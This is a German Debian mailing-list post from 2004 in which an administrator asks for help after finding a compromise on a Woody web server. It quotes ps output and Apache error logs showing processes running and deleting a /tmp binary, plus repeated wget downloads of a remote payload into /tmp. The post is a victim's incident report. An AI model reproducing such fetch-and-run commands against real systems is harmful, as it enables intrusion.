Hallo Liste, kann mir hier jemand auf die Spr�nge helfen, bzw. weiterf�hrende Links nennen was ich mir da eingefangen habe?
System ist ein Debian-Woody mit aktuellen Security-Patches. Heute abend fiel mir das in 'top' auf: 20788 www-data 18 0 488 460 428 R 51.6 0.1 0:01 exe 20787 www-data 14 0 488 460 428 R 46.8 0.1 0:05 exe 'ps aux' lieferte das hier: www-data 20769 47.7 0.1 1480 460 ? R 19:36 0:06 sh -c /tmp/dsadas;rm -f /tmp/dsadas www-data 20783 45.1 0.1 1480 460 ? R 19:36 0:02 sh -c /tmp/dsadas;rm -f /tmp/dsadas Diese beiden Prozesse lie�en sich auch durch das Beenden von 'apache' und 'apache-ssl' nicht beirren, ich habe sie dann von Hand durch ein 'kill' beendet. /var/log/apache/error.log gibt folgendes her: [Sat Aug 21 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) /tmp/dsadas: No such file or directory exe: no process killed dsadas: no process killed /tmp/dsadas: no process killed exe: no process killed dsadas: no process killed /tmp/dsadas: no process killed /tmp/dsadas: No such file or directory [Sun Aug 22 06:25:16 2004] [notice] SIGUSR1 received. Doing graceful restart und heute: [Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory --18:06:28-- http://xpire.info/cli.gz => `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .......... ........ 100% 20.04 KB/s 18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147] ls: /usr/bin/X11/X: No such file or directory --18:06:33-- http://xpire.info/cli.gz => `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .......... ........ 100% 14.68 KB/s 18:06:35 (14.68 KB/s) - `/tmp/a.out' saved [19147/19147] ls: /usr/bin/X11/X: No such file or directory ls: /usr/bin/X11/X: No such file or directory [Mon Aug 23 19:33:56 2004] [notice] caught SIGTERM, shutting down Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Eintr�ge dieser Art feststellen. [Thu Aug 12 09:42:00 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument [Thu Aug 12 13:59:22 2004] [notice] caught SIGTERM, shutting down Das Einzige was ich mit google gefunden habe ist 'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze f�r einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch "Reste" in '/tmp' und einen Prozess 'pra' auf einem tcp-Port. Das hatte ich definitiv _nicht_. Weder einen zus�tzlichen Port offen, noch _irgendwas_ au�er bekanntem in '/tmp'. Any Hints? PS: Nein, Sven. Nicht momo. gruss f -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
